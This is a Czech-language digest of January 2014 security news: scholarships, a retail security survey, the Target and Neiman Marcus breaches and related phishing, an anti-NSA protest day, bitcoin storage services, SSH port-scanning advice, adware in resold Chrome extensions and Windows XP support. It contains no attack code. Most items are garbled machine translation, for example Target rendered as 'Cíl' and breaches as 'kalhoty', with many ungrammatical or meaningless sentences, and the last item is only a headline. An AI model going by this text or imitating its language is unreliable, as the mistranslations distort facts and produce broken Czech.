zkušenosti s nimi.
(ISC) 2 Nadace nabízí 145,000dolar v informační bezpečnosti stipendia
23.1.2014 IT
(ISC) 2 Foundation, nezisková charitativní trust, který si klade za cíl posílit studenty, učitele a širokou veřejnost, aby byl zajištěn jejich on-line život komunity kybernetické bezpečnosti vzdělávání a osvětu , dnes oznámila, že aplikace období stipendium pro rok 2014. Uzávěrka přihlášek pro studenty a fakulty předložit vyplněnou žádost je 00:00 EST na úterka 1.4.2014. Prostřednictvím tohoto stipendijního programu, vysokoškolák, absolvent a postgraduální studenti mají možnost vytvořit stabilní kariéru v oblasti informační bezpečnosti . Podle 2013 Global Information Security Workforce studie, globální nedostatek odborníků v oblasti informační bezpečnosti má hluboký dopad na světovou ekonomiku. Tato stipendia jsou nejen přimět studenty, aby usilovali o kariéru v tomto oboru, ale také pomoci řešit rostoucí poptávku po kvalifikované Odborníci kybernetické bezpečnosti na celém světě. "Je důležité, že budeme pracovat naplnit potřeby společnosti v oblasti počítačové bezpečnosti vyškolených profesionálů prostřednictvím budování budoucí pracovní sílu," řekla Julie Škrabka , ředitel (ISC) 2 nadaci. "Pro mnohé z těchto studentů, jejich finanční situace, jsou náročné a naši stipendia poskytují finanční prostředky, které potřebují, aby pokračovaly ve svém vzdělání. Těším se na vliv více bezpečnostních informací studentům život-měnící stipendií v roce 2014. " v roce 2014 kategorie stipendia jsou: Dámské stipendia: Chcete-li se inspirovat ženy, aby se připojily k někdy-rostoucí oblasti informační bezpečnosti každý rok (ISC) 2 FOUNDATION dotace až dvě stipendia v celkové výši až US $ 40,000. vysokoškoláka stipendií: Odborníci bezpečnostní Snaha informace mají možnost zmírnit některé z jejich vzdělávacího finanční zátěže s stipendium (ISC) 2 Nadace vysokoškoláka, který nabízí vysokoškolských studentů studuje informační bezpečnosti granty až do USA . 5,000 amerických dolarů za příjemce výzkumný projekt Graduate (y): Postgraduální studenti často potřebují finanční prostředky na provádění speciálních výzkumných projektů. Financování Osivo až osm grantů budou uvedeny pro až US $ 3,000 na příjemce. Harold F. Tipton Memorial Scholarship: (ISC) 2 Nadace Harold F. Tipton Memorial Scholarship byla založena za účelem poskytovat vášnivý, ctižádostivý mladý informační bezpečnosti profesionály prostředky sledovat cestu k dokonalosti průmyslu, jako postavený na konci pan Tipton. Fakulta certifikační zkoušky poukázky: povzbudit více akademické účast v profesi a certifikační proces, (ISC) 2 poskytne poukazy platí pro jeden CISSP nebo CSSLP zkoušky a , o certifikaci, první ročník členských příspěvků. Můžete se dozvědět více o stipendia zde.
Jeden z pěti SMB prodejců postrádá základy bezpečnosti
23.1.2014 Bezpečnost
Fortinet zveřejněn nový výzkum, který ukazuje, kde malé a střední obchodníci stojí v souvislosti s předpisy shody, bezpečnostní politiky a nových technologií, které pomáhají spravovat velkých objemů dat a bezpečnostní infrastrukturu.
Na základě výsledků nezávislého US-založené průzkumu 100 SMB maloobchodních organizací s méně než 1000 zaměstnanci základě průzkumu vyplynulo, že většina prodejců jsou si vědomi stále složitějším hrozby a regulačního prostředí a uplatňování osvědčených bezpečnostních postupů a zásad dodržování, aby se bezpečné. Nicméně, více než jeden z pěti obchodů (22 procent) nejsou PCI DSS kompatibilní, a dalších 14 procent nevím, jestli jsou PCI kompatibilní, nebo ne. Navíc, více než polovina (55 procent) dotázaných maloobchodníků neví Požadavky porušovat jejich stav v zabezpečení, zatímco 40 procent nemají žádnou zavedenou politiku, ulpívající na těchto požadavků. Tato mezera vytváří potenciál pro porušení dodržování právních předpisů, pokud jsou data ohrožena, což vede ke ztrátě dat zákazníka, finanční sankce, soudní spory a poškození značky a pověsti. Další výsledky průzkumu ukazují, že mnohé malé a střední podniky nepodaří zaměstnat silné bezpečnostní postupy, jako jsou politiky, aby vynutit zabezpečení heslem, které je staví na riziko brute-force útoky, narušení dat a regulačních porušování lidských práv. S ohledem na budoucnost bylo na nových a inovativních technologií, více než polovina SMB obchodníků se snaží na palubě maloobchodní analýzy, které jim pomohou pochopit nákupních trendů a chování zákazníků v obchodě. A s okem k konsolidace a snižování nákladů IT, drtivá většina SMB maloobchodníků by mělo zájem o produkty, které jsou schopny spojit obě fyzické a zabezpečení sítě funkcí v jednom zařízení. Security zlepšuje, ale díry existují základní bezpečnostní osvědčené postupy i nadále představují další velkou výzvu pro malé a střední obchodníky. Spotřebitelé mohou chtít dvakrát přemýšlet o tom, skákání na bezplatné veřejné bezdrátové síti. Podle průzkumu, 15 procent z prodejců nabízejících zdarma pro hosty Wi-Fi připojení na internet nepodaří prosadit jakékoliv bezpečnostní politiky, jako je například blokování nepřijatelný obsah, škodlivé webové stránky nebo malware. To je nedostatek, který vystavuje hosty potenciální malware, a zároveň se zvyšuje riziko infekce pro maloobchodní sítě, která není řádně segmentované. Optimisticky, 60 procent SMB prodejců mají hesla ochranu a prosazování pravidelně. Nicméně, 40 procent prodejců nevyžadují jejich zaměstnanci alespoň jednou za rok změnit své heslo, což výrazně zvyšuje jejich riziko ztráty dat. Zatím, mnoho SMB prodejci jsou laxní, pokud jde o nakládání sensitive DATA - nedostatek, který by mohl vystavuje informací pro spotřebitele, aby zloději identity. Zatímco téměř tři pětiny (59 procent) SMB prodejců uvedlo, že mají politiku likvidace dat na místě, o 29 procent postrádají stanovený plán likvidace dat, zatímco 12 procent je zcela nevědomý politiky likvidace dat a jejich organizace. Maloobchodníci zvážit nové způsoby, jak řídit bezpečnost , údaje o zákaznících Průzkum ukázal, že malé a střední obchodníci hledají nové způsoby, jak zefektivnit více bezpečnostních řešení pro snížení nákladů a zjednodušení správy. shodné s konsolidace trendy, 80 procent maloobchodníků chcete vidět fyzické zabezpečení infrastruktury, jako jsou videokamery, DVR, a poplašné systémy, sídlí v jednom zařízení, které také spravuje zabezpečení sítě mechanismy, jako je firewall, VPN, anti-virus a webový aplikační firewall. Správa zabezpečení se také mění. 53 procent prodejců uvedlo, že jsou správu a údržbu jejich vlastní bezpečnostní infrastrukturu na místě. Nicméně, 18 procent maloobchodníků jsou nyní spoléhat na Managed Security Services poskytovatele (MSSP), aby se zvýšil jejich zabezpečení obranyschopnosti, zatímco dalších 29 procent se snaží pohybovat další bezpečnostní funkce, aby třetí strana podařilo poskytovatele služeb. Stejně jako mnoho dalších průmyslových odvětví, maloobchodníky zkoumají příležitosti po celém maloobchodních analytiky, aby se lépe porozumět, posoudit a vliv chování návštěvníků a přímo cílové zákazníky akcích a obchodů. Výrazná většina (59 procent) respondentů uvádí, že jsou obeznámeni s maloobchodními analýzy, které mohou využít Wi-Fi povoleny smartphony sběr dat nakupujících. Z toho 59 procent, 75 procent respondentů jsou buď aktivně využívají tyto analytické řešení, nebo mají velký zájem o ně. Pouze zbývajících 25 procent říká, že jsou ochotni použít tento typ technologie, z úcty k soukromí svých zákazníků. Průzkum také ukázal, že malé a střední obchodníci by s větší pravděpodobností uvažovat o maloobchodních analýzy kdyby byly větší znalosti o technologii. Z 41 procent, který řekl, že jsou obeznámeni s maloobchodními analýzy, téměř polovina (49 procent) vyjádřit, že by chtěli jednou použít technologii.
Ochrana dostává do popředí zájmu
23.1.2014 Ochrana
AnchorFree předpokládá digitálních soukromí, bezpečnost a přístup obavy budou eskalovat v roce 2014 jako následující spotřebitelské trendy se tvar.
Přesun na soukromé a nevymazatelného sociálních médií: Tam je posun příliv v sociálních médiích, a to zejména u mladších spotřebitelů, protože uživatelé stáhnou z rozsáhlé, bezohledné sdílení a obrátit se k více soukromých, temporální, one-to-one interakce. Jako spotřebitelé kladou větší důraz na ochranu soukromí a kontrolu nad obsahem, které zavádějí nové způsoby, jak sdílet zvláštní okamžiky s rodinou a přáteli. Jiné aplikace vydělávat na měnící se postoje zahrnují SnapChat, který umožňuje uživatelům posílat fotografie a zprávy, které zmizí, Instagram, že v poslední době přidal soukromé one-to-one zpráv, a Whisper, které umožňují uživatelům, aby se zapojily s ostatními anonymně. šíření mobilního obchodu: Mobile commerce nebo m-commerce, je na vzestupu. Z okamžitého lokálního dodání zboží do hudby a filmy ke stažení, stále více spotřebitelů se pomocí svých tablety a smartphony nakupovat kdykoli a kdekoli inspirace stávky, a to zejména prostřednictvím bezdrátové hotspoty v kavárnách, na letištích a na cestách. VPN může pomoci zabránit platební karty a účtu přihlášení z hacknutý. City-sponzorována ani Wi-Fi rostoucí rychlosti a popularity: Veřejné Wi-Fi je již neomezuje na hranice kavárně nebo v knihovně. Mnoho měst po celých Spojených státech a po celém světě nyní nabízíme obecní Wi-Fi parků, ulic a čtvrtí. New York City nedávno oznámila uvedení toho, co bude národ je největší venkovní Wi-Fi síť, která bude deka 95 bloků v Harlemu, a San Francisco je přidání bezplatné Wi-Fi připojení k internetu na jednom ze svých nejrušnějších ulic - Market Street. Volný hotspot služby následuje po instalaci Googlu veřejné Wi-Fi připojení na internet v San Francisco městských parků. Veřejné Wi-Fi připojení je ve své podstatě méně bezpečné, takže použití VPN je vysoce doporučeno. Urychlení šíření světové i domácí cenzuru internetu a sledování chování: Jak internet a sociální média stále důležitým nástrojem pro komunikaci, sdílení informací a přístupu k nim zprávy, rostoucí počet subjektů, od korporací na vlády a dalších veřejných institucí v USA a zámoří cenzurovat internet a sledovat on-line chování. Miliony uživatelů internetu setkat blokován, cenzurovány nebo filtrované obsah na sociálních sítích, video a hudební stránky, streaming služeb a e-mail poskytovatelů na pracovišti, ve škole, na cestách, nebo tím, že prostě žijí ve vysoce regulovaných zemích. Naštěstí existují způsoby, jak uživatelé mohou obejít cenzuru a sledování, získávání anonymní přístup k obsahu, a to prostřednictvím využívání služeb VPN
Soukromí zastánci oznámit den protestu proti NSA špionáže
21.1.2014 Špionáž
Široká koalice aktivistických skupin, podniků a on-line platforem bude mít celosvětový den aktivismu v opozici vůči NSA hmotnost špionážní režimu dne 11. února.
Přezdívaná "The Day bojujeme Back", den aktivismu bylo oznámeno v předvečer výročí tragické procházení aktivisty a technolog Aaron Swartz. Protest je jak v jeho cti a na oslavu vítězství nad zákona Stop Online Piracy před dvěma lety v tomto měsíci, který mu pomohl urychlit. účastníků, včetně Access, Demand Progress, Electronic Frontier Foundation, Boj o budoucnost, svobodný tisk, BoingBoing, Reddit, Mozilla, ThoughtWorks, a ještě víc, se připojí k potenciálně miliony uživatelů internetu, aby tlak na zákonodárce, aby ukončily hromadné dohled -. obou Američanů a občany na celém světě Aaron Swartz měl brilantní, zvídavou mysl, že zaměstnán na koncích technologie, psaní, výzkum, umění, a ještě mnohem více. Blížit se ke konci jeho života, jeho cílem bylo politický aktivismus na podporu občanských svobod, demokracie a ekonomické spravedlnosti. On vyvolal a pomáhal řídit pohyb, který by nakonec porazit zákon Zastavit pirátství on-line v lednu 2012. David Segal, výkonný ředitel Demand Progress, který on co-založený s Swartz, řekl: "V současné době největší hrozbu k internetu zdarma, a širší svobodná společnost, je hmotnost špionáž režim agentury národní bezpečnosti. Pokud Aaron byl naživu, byl by na frontách, bojovala proti těmto praktikám, které narušují naši schopnost zapojit se mezi sebou jako skutečně svobodné lidské bytosti. " "Aaron ukázal, nám, že je technolog ve 21. století znamená přijmout opatření, aby se zabránilo technologie před obrátil proti veřejnému zájmu. Nyní je čas pro globální kmene technologů, aby povstali spolu a porazit masové dohled, "řekl Roy Singham, předseda globální ThoughtWorks technologie společnosti. "Od prvních odhalení loni v létě, stovky tisíc uživatelů internetu se spojily online a offline na protest proti neústavní programy dozoru NSA. Tyto programy napadnout naše základní práva pro připojení a komunikaci v soukromí, a stávka na základy demokracie jako takové. Jen široká hnutí aktivistů, organizací a firem mohou přesvědčit Washington k obnovení těchto práv, "říká Josh Nucený Free Press. V den akce, koalice a aktivisté představuje telefonovat a řídit e-maily zákonodárci. Vlastníci webových stránek nainstaluje bannery na podporu své návštěvníky bojovat proti dohledu, a zaměstnanci technologických společností budou požadovat, aby jejich organizace dělat to samé. internetoví uživatelé jsou vyzváni k rozvoji memy a změnit své sociální média avatary, aby odrážely jejich požadavky . Webové stránky a uživatelé internetu, kteří se chtějí zúčastnit, se mohou navštívit TheDayWeFightBack.org se přihlásit k odběru e-mailových aktualizací a zaregistrovat webových stránek k účasti.
Bitcoin chladírna a pojišťovací služby klíček
21.1.2014 IT
Výhody a nevýhody používání a investování do Bitcoin a krypto měny obecně již nejsou tajemstvím, a řešení některých problémů jsou prezentovány téměř denně. Jednou z těch největších je udržet vaše Bitcoin skrýš v bezpečí, a to jak před počítačovými podvodníky a vaše vlastní chyby v úsudku. Obvykle to znamená, že udržet své bitcoins v "chladném uskladnění":. V papírové nebo offline hardware peněženka, zařízení pro ukládání dat nepřístupné nikomu kromě vlastníka, nebo on-line, ale šifrován (s klíčem v režimu offline šifrování) , ale pokud chcete, . nyní můžete také pojistit své bitcoins proti krádeži nebo ztrátě, UK-založená společnost představila eliptické Vault, skladovací služby, se pojištění poskytovaného Lloyd je Londýna služba chrání bitcoins svých zákazníků s "vyspělými hlubokých technik chladírenské" - skrýš je šifrována a klíče jsou uloženy v režimu offline. "Vícenásobné kopie jsou zachovány, a každý z nich je chráněn dalších vrstev kryptografického a fyzické bezpečnosti, které jsou přístupné pouze usnášeníschopnosti našich ředitelů," vysvětluje internetových stránkách společnosti. úroveň krytí je až k uživateli, a cena za službu je stanovena v závislosti na této volbě. Společnost říká, že nedělají nic s uloženými bitcoins, a že zákazníci mohou dělat výběry, kdykoli budou chtít. Nicméně, pokud si myslíte, že o používání jejich služeb, pečlivě přečtěte jejich podmínky služby je dobrý nápad. Ty v současné době uložit pouze bitcoins, ale jsou otevřené pro individuální požadavky pro uložení dalších crypto měny stejně. Čas ukáže, zda tato služba bude úspěšná . Caleb Chen z CryptoCoinsNews říká, že každý, kdo ví, co dělá, může uložit své vlastní bitcoins stejně jako eliptický. "Neexistuje větší zabezpečení, které jednotlivec nemůže vzít na sebe, a ve skutečnosti pouze inovace fiat denominována pokrytí," řekl poukázal . V další novinky, GoldMoney, jeden z Británie je největší drahých skladovacích kov firem, oznámila, že to bude také nabízet studené řešení pro bitcoins úložiště, ale bez pojištění, přes jeho spin-off firmy Netagio. Společnost se ujistěte, že realizovat - spolu s úložiště offline - mnoho bezpečnostních opatření a kontrol na ochranu bitcoins svých zákazníků. Také, oni se o to si uvědomit, že všechny uložené bitcoins a šifrované zálohy společnosti se nacházejí v Evropské unii a ve Švýcarsku.
Fake oznámení Target porušení vede k phishingové a složité podvody
21.1.2014 Viry | Phishing | Kriminalita
Rozsáhlá Target porušení se rozezněly široko daleko v amerických médiích, a její zákazníci měli starat o jejich osobní nebo informace o kreditní kartě jsou zneužívány. Po počátečním porušení zjevení na konci prosince, firma začala rozesílat oznámení o narušení bezpečnosti, aby potenciálně dotčených zákazníků, a pokračoval dělat tak v důsledku objevu dalšího ohrožení informací . ale počítačoví podvodníci se také začalo rozesílat oznámení v cílových jménem, se snaží přimět uživatele k podělí o své osobní údaje, stejně jako kompletní on-line průzkumy. Podle . počet těchto nevyžádaných e-mailů shromážděných Malcovery v posledních několika dnech, kampaň není (zatím) masivní e-mail na otázku se snaží získat pozornost obětem, ale hlásat "Upozornění na Target Zákazníci - vaše identita je ohrožena" v linka předmět. V současné době je e-mail odeslán z Yahoo e-mailovou adresu, která zřejmě nemá nic společného s Target. ale znepokojující obsah e-mailu, může však urychlit některé uživatele ke kliknutí na nabízené odkazy (klikněte na screenshotu pro zvětšení): Tato e-mail není reálné, jednoduché phishing e-mail. Uživatelé, kteří následují odkazy jsou přijata prostřednictvím řady přesměrování na stránku s přehledem a nabízí 1000 dolarů nákupní poukázku Sears / JCPenney / Kohl 's / Macy' s jako pobídka, hlásí Gary Warner , Malcovery spoluzakladatel a hlavní technolog. , ale jednou, že Šetření je ukončeno, jsou přesměrovány na nové průzkumy na různých stránkách běžet na systémech různých reklamních firem. mimo jiné, že oběti jsou instruováni, aby odpověděli na otázky, které mohou být použity k vytvoření poměrně přesnou představu o svých obchodních aktivit, které budou následně být přímo vázána na jejich reálného světa identity, protože oběti se pak vyzval, aby zadali své jméno, adresu, telefonní číslo, e-mailovou adresu, datum narození, atd. Jakmile tento úkol je u konce, stále existuje mnoho osobních otázek odpověděl:
Pak otázky týkající se zaměstnanosti, vzdělání a zdraví jsou vyběhl, a vše, zatímco podvodníci viset na odměnu (která není obrátil na 150 dolarů Walmart dárkové karty) před uživatelů. Pak další sadu průzkumů je vyrukovali. A pak oběť je nutné stáhnout add-on (ShopAtHome.com Toolbar) a aby bylo jeho výchozího poskytovatele hledání a výchozí novou kartu. Nakonec, oni jsou řekl, že musí koupit sadu nožů se nebo se zaregistrujte pro kreditní zprávy služby, a pak si koupit více věcí. Složitost tohoto podvodu je ohromující. Bohužel, tam jsou vždy - vždy! -. Dost nezkušení uživatelé internetu, kteří spadají do něj, a dělat to stojí za to pro podvodníky.
Neiman Marcus, další tři američtí maloobchodníci porušení
21.1.2014 Kriminalita
V návaznosti na zjištění, že americký maloobchodní gigant Cíl byl cílených počítačoví zloději přijde zpráva, že americký obchod s luxusním oddělení Neiman Marcus také utrpěl porušení během konce prázdnin roku, stejně jako tři další nespecifikované amerických prodejců.
"Neiman Marcus byl informován naším procesorem kreditní karty v polovině prosince potenciálně neoprávněné činnosti platební karty, ke které došlo následující nákupu zákazníkem na našich prodejnách Neiman Marcus mezinárodní skupiny," společnost uvedla pro tisk. "Informovali jsme federální orgány činnými v trestním řízení a pracují aktivně s americkou tajnou službou, platebních značek, náš procesor kreditní karty, na které vedou vyšetřování, inteligence a řízení rizik firmy a přední forenzní firmy, aby prošetřila situaci. " byl objeven důkaz, že společnost byla obětí obtěžování které se forenzní firmy k 1. lednu, a společnost okamžitě podnikl kroky, aby obsahoval vniknutí a pro zvýšení informační bezpečnosti. "Bezpečnost informací našich zákazníků je vždy prioritou a jsme upřímně litovat nepříjemnosti. Jsme kroky tam, kde je to možné, aby oznámily zákazníky, jejichž karty víme, že byly použity podvodně po provedení nákupu v našem obchodě, "dodali. Do té doby, Reuters hlásil , že podle nejmenovaných zdrojů obeznámených s Target a Neiman Marcus útoky, další tři američtí maloobchodníci s mall prodejen byly porušeny během prázdnin v podobným způsobem. Zdá se, že vymáhání práva za to, že útočníci pocházejí z východní Evropy, a může být pozadu všechny tyto kalhoty, ale že teorie je ještě třeba prokázat. Jako připomínka: Cílová nejprve oznámena veřejnosti o útočníků řídící kompromisy Point-of-Sale terminálů u značného počtu jejich cihla-a-malty obchodech po celých Spojených státech, což může mít za následek krádež informací o kreditních kartách o více než 40 milionů zákazníků. Pak, asi 20 dní později, se ukázalo, že osobní údaje více než 70 milionů zákazníků byla také ohrožena. Není mnoho informaci o cílové porušení byla sdílena veřejně, ale společnost je CEO Gregg Steinhafel se zmínil v neděli, že se našel malware instalován na jejich point-of-prodej registrů, což vede ke spekulacím , že RAM škrábání malware může být použitý k zachycení dat nešifrované karty.
CyberRX: první v celém odvětví zdravotnictví kybernetický útok cvičení
21.1.2014 Počítačový útok | Kriminalita
HITRUST povede celém odvětví úsilí provádět cvičení k simulaci kybernetických útoků na zdravotnických organizací, s názvem CyberRX. Výsledky budou použity pro vyhodnocení odezvy a hrozeb připravenost průmyslu proti útokům a pokusům narušit americké zdravotnictví odvětví činnosti.
Tato cvičení bude probíhat ve spolupráci s americkým ministerstvem zdravotnictví a sociálních služeb (DHHS) a velkých průmyslových podniků zdravotnictví. První cvičení se uskuteční v průběhu dvou-denní lhůty na jaře roku 2014, a druhá se bude konat v létě 2014. CyberRX bude zahrnovat účast poskytovatelů, zdravotních plánů, vedoucích předpis dávek, lékáren a farmaceutických výrobců, a DHHS. Cvičení se bude zabývat jak široké a segmentu specifické scénáře zaměřené na informační systémy, zdravotnické prostředky a další nezbytné technologické zdroje na zdravotnictví. Zjištění budou analyzovány a použity k identifikaci oblastí pro zlepšení v koordinaci HITRUST Cyber Threat Intelligence a koordinace Incident Center (C3), s programy reakce na bezpečnostní a incidentů;. a sdílení informací mezi zdravotnickými organizacemi, HITRUST a vládních agentur "Byli jsme koordinaci a spolupráci s HITRUST zvýšit dostupné zdroje pro zdravotnictví," řekl Kevin Charest, CISO , americké ministerstvo zdravotnictví a sociálních služeb. "Naším cílem cvičení je identifikovat další způsoby, které nám mohou pomoci průmyslu lépe připraveni pro a lépe reagovat na kybernetické útoky. . Toto cvičení bude generovat cenné informace, které lze použít ke zlepšení našeho společného připravenost " Kromě podpory organizacím při hodnocení své vlastní procesy, bude cvičení března zaměřit na následující cíle:
Rozvoj lepší pochopení kybernetické pohotové reakce hrozba zdravotnického průmyslu
Měření účinnosti HITRUST C3 v podpoře zdravotnického průmyslu a příležitosti pro zlepšení
Testování koordinaci s americkým ministerstvem zdravotnictví a sociálních služeb týkající se kybernetických hrozeb a reakci zdravotnictví
Dokumentace hrozeb a útoků scénáře hodnoty pro budoucí cvičení, která provozují další zdravotnictví průmyslové organizace a na podporu připravenosti průmyslu.
"Jako kybernetické hrozby nadále zvyšovat a počet útoků zaměřených na zdravotnické organizace roste, průmyslové organizace hledají užitečné a žalovatelné informace s pokyny, které vypuzovací jejich stávající informační bezpečnosti programů bez duplikace nebo komplikací," řekl Daniel Nutkis, generální ředitel, HITRUST .
Klíčové bezpečnostní program a cenově dostupné údaje pro ředitelů zastává
21.1.2014 Bezpečnost
Benchmarking proti podobným organizacím poskytuje IT vůdci s výkonnými nástroji pro analýzu resortní výkon a získat výkonnou podporu pro správu.
Protože neexistuje žádný univerzální standardy pro bezpečnostní programy, benchmarking může pomoci CISO a další vysocí představitelé bezpečnostních měřit efektivitu svých programů "a komunikovat s horním řízením, jak bezpečnost držení těla a programy společnosti ve srovnání s ostatními podobnými organizacemi. Jako crowdsourced průzkumu benchmarku, kterou si členové-Wisegate kteří se senior-úrovni bezpečnosti IT odborníci-publikace o IT bezpečnosti Benchmark souhrnné zprávě Wisegate 2013 si klade za cíl poskytnout užitečné informace a jasné ukazatele pro IT bezpečnost. Průzkum byl vyvinut skupinou zkušených ředitelů zastává a usnadnit Wisegate odhalit relevantní a komplexní benchmarků bezpečnostní údaje lídři potřebují zlepšit účinnost bezpečnostních programů, prokázat obchodní hodnotu a získat výkonnou podporu pro nové programy nebo nedostatek iniciativy.
Můžete spustit, ale nemůžete skrýt (SSH a další otevřené služby)
21.1.2014 Bezpečnost
V každém studiu internetového provozu, zjistíte, že jednou z hlavních činností útočníků je montáž skenování portů, kteří hledají pro otevřené SSH servery, obvykle následuje trvalé útoky brute-force. Na zákaznických strojů, které jsem pracoval, něco s otevřeným portem tcp/22 pro SSH, SFTP (FTP přes SSH) nebo SCP bude mít tolik pokusů o přihlášení na těchto portech, které používá systémové protokoly k řešení jakýkoliv jiný problém, o systém může být velmi obtížné.
Napsali jsme to mnohokrát a často jedna z prvních věcí, které lidé dělají - myslí, že to bude chránit - je přesunout jejich službu SSH na nějakém jiném portu. Často se lidé budou volit 2222, 222 nebo nějaký "logický" variantu jako svůj nový domov pro SSH, opravdu to prostě snímá hluk pozadí automatizovaných útoků, bude skutečné útočníci stále najít vaši službu. Probrali jsme tento fenomén a reálné možnosti pro ochranu otevřené služby, jako je SSH v minulosti (mapu pro ssh inurl: isc.sans.edu na seznamu)
Co mě přemýšlet o tom byl trochu "dolování dat" Udělal jsem další noc v databázi Dshield pomocí podávání zpráv rozhraní na stránkách ISC, stejně jako naše API. Port 22 doprava samozřejmě zůstává v horní části našeho seznamu portů bytí
Nicméně, minulý týden jsme viděli neobvyklý nárůst počtu TCP portu 222: https://isc.sans.edu/api/topports/records/10/2014-01-13 and https://isc.sans.edu/api/topports/records/10/2014-01-14
Na 14., portu 222 ve skutečnosti přikrýval náš seznam. Tato akce trvala jen 2 dny, a byl primárně pocházejí pouze ze dvou IP adres. Poznámka: Druhý špice v prosinci.
https://isc.sans.edu/port.html?port=222
To vypadalo jako plné internetové skenování na portu 222, pocházel z těchto dvou adres (nebudu říkat jim tady). Při bližším pohledu na IP je, že to nevypadá jako nic zvláštního, ve skutečnosti jeden byl v rozsahu DSL, tak dva dny na úplné skenování je o právu, vzhledem k rychlé skenování nástroje, které mají v těchto dnech a šířku pásma domácí uživatele bude obvykle mají.
Ponaučení z příběhu? Bez ohledu na to, kde se přesunout své poslechové TCP porty, tam je někdo, kdo je skenování, které tento port hledá pro otevřené služby. Pomocí "logický" přístup k vyzvednutí nové číslo portu (například 222 pro USV nebo ssh, 2323 pro telnet a tak dále), jen dělá práci jednodušší pro útočníka. A to je jen účetnictví pro automatizované nástroje dělají nevybíravé skenování. Pokud vaše organizace je, že rychlé cílené, plné skenování portů na celý rozsah IP trvá jen pár minut nastavení a bude dokončena během jedné hodiny - i když je to na "nízké a pomalé" časovač (vyhnout se své IPS nebo držet počítat položka protokolu dolů), bude to pravděpodobně bude provedeno v den nebo dva. Přesun otevřenou službu na nestandardním portu není ochrana vůbec, pokud jsou cílené.
Pokud to není nezbytně nutné mít službu na veřejný internet, zavřít port. Pokud potřebujete nabídnout službu, dal ho za VPN tak, aby pouze oprávněné lidé mohou dostat k němu. A téměř ve všech případech, nemusíte že SSH port (bez ohledu na číslo portu), otevřenou do celého Internetu. Omezení je na seznamu známých adres IP nebo ještě lépe tím, že by se za VPN je zdaleka nejlepší způsob, jak jít. Pokud musí mít "společný cíl" služby, jako je SSH přístup na internet, používají certifikáty spíše než, nebo kromě jednoduchých pověření, a zvážit zavedení omezení rychlosti služby, jako fail2ban, takže jakmile útoky brute-force začít, jste dostal metodu "shun" útočník (i když ani jeden z těchto opatření bude chránit vás ze základního skenování portů).
Spammeři skupují doplňky pro Chrome a mění je v adware
21.1.2014 Spam | Viry
Šiřitelé agresivní reklamy si našli nový způsob, jak své výtvory dostat k internetovým uživatelům.
V současné době jsou známé dva případy, kdy se dlouhou dobu legitimní rozšíření pro prohlížeč Chrome po prodeji změnilo ve zdroj vtíravé reklamy.
Jako první si nekalé praktiky nových vlastníků doplňku stěžoval Amit Agarwal, který svůj nástroj Add to Feedly v loňském roce prodal třetí straně. Ta jej pak bez jakýchkoliv rozpaků přeměnila v adware. V době prodeje mělo rozšíření přes 30 tisíc uživatelů.
Druhým známým případem je doplněk Tweet This Page od Romana Skabičevského, který své dílo prodal loni v listopadu. Skabičevskij se podle svých slov rozhodl rozšíření prodat za 500 dolarů, protože neměl čas na jeho další zlepšování.
„Žena vystupující pod jménem Amanda mě kontaktovala s tím, že má zájem o mé rozšíření pro další vývoj,“ napsal Skabičevskij v e-mailu. Sice mu to prý přišlo divné, protože jeho doplněk je šířen jako open source, takže má k jeho kódu každý přístup a může na něm pracovat, přesto však na prodej kývl.
Agarwalův příběh zní podobně – své rozšíření prý prodal za čtyřmístnou sumu poté, co se mu ozvala nějaká žena. „O měsíc později přišli noví majitelé Feedly s aktualizací, kterou umístili na Chrome store. Update však nepřinesl žádné nové funkce ani neopravoval žádné chyby. Místo toho se v něm objevily reklamy,“ řekl Agarwal.
V obou případech však nejde o reklamy, se kterými se běžně setkáváme na internetu. Jde o neviditelné reklamy běžící na pozadí, které nahrazují každý webový odkaz odkazem na vybraný partnerský program. Jednoduše řečeno se tak po aktivaci rozšíření objeví na každé webové stránce adware.
Z hlediska autorů adwaru je tento přístup méně pracný, než kdyby sami vytvářeli nová rozšíření pro Chrome. Při nákupu zaběhlého doplňku si totiž kupují často i velkou uživatelskou základnu. Tato investice se jim tak obvykle velmi rychle vrátí.
Obě zneužitá rozšíření již na Chrome Store nenajdete. Google je zřejmě na popud uživatelů odstranil. Zatím se neví, jestli šlo o ojedinělé případy, nebo je rizikových přeprodaných doplňků v oběhu více.
Zpráva o adwaru v rozšířeních pro Chrome se začala rychle šířit. Vývojáři doplňku Honey prý byli hned několikrát kontaktováni autory adwaru a malwaru. Jeden z nich jim dokonce nabízel šestimístnou částku za každý měsíc, po který s ním budou přímo spolupracovat.
Microsoft prodloužil antivirovou podporu Windows XP do roku 2015
20.1.2014 Viry | Bezpečnost
Všechny ostatní druhy uživatelských podpor skončí podle původního plánu již letos.
Přes 30 % všech desktopů po celém světě běžících stále na starém operačním systému Windows XP bude i příští rok chráněno proti malwaru. Microsoft se totiž rozhodl prodloužit o 1 rok anti-malwarovou podporu. To i přesto, že jeden z nejpopulárnějších operačních systémů všech dob letos v dubnu oficiálně odejde do důchodu.
Uživatelé Windows XP tak budou až do 14. července 2015 varováni před možnými riziky infekce a budou dostávat anti-malwarové aktualizace. O všechny ostatní druhy podpor - opravy chyb, softwarové aktualizace či zákaznickou podporu, však uživatelé přijdou podle plánu 8. dubna 2014.
Tuto zprávu pravděpodobně uvítají zejména firmy, které stále nepokročily v přechodu na novější verze Windows a jejich kritické aplikace by tak za několik měsíců běžely na zranitelných počítačích. Takových firem je i přes dlouhodobou kampaň Microsoft hodně.
Na trh se Windows XP dostaly v roce 2001 a rychle se staly nejpopulárnějším operačním systémem na světě. Na vrcholu je používalo přes 800 miliónů uživatelů.
Podle dat deníku The Economist běžely Windows XP ještě loni v dubnu na 39 % firemních počítačů.
Microsoft chtěl se systémem úplně skoncovat již několikrát. Vždy si to ale rozmyslel po negativní reakci ze strany uživatelů – v roce 2008 dokonce vznikla petice. Současné řešení bychom tak mohli označit za jakýsi kompromis.
Světlo Patch Tuesday blíží
18.1.2014 Zranitelnosti
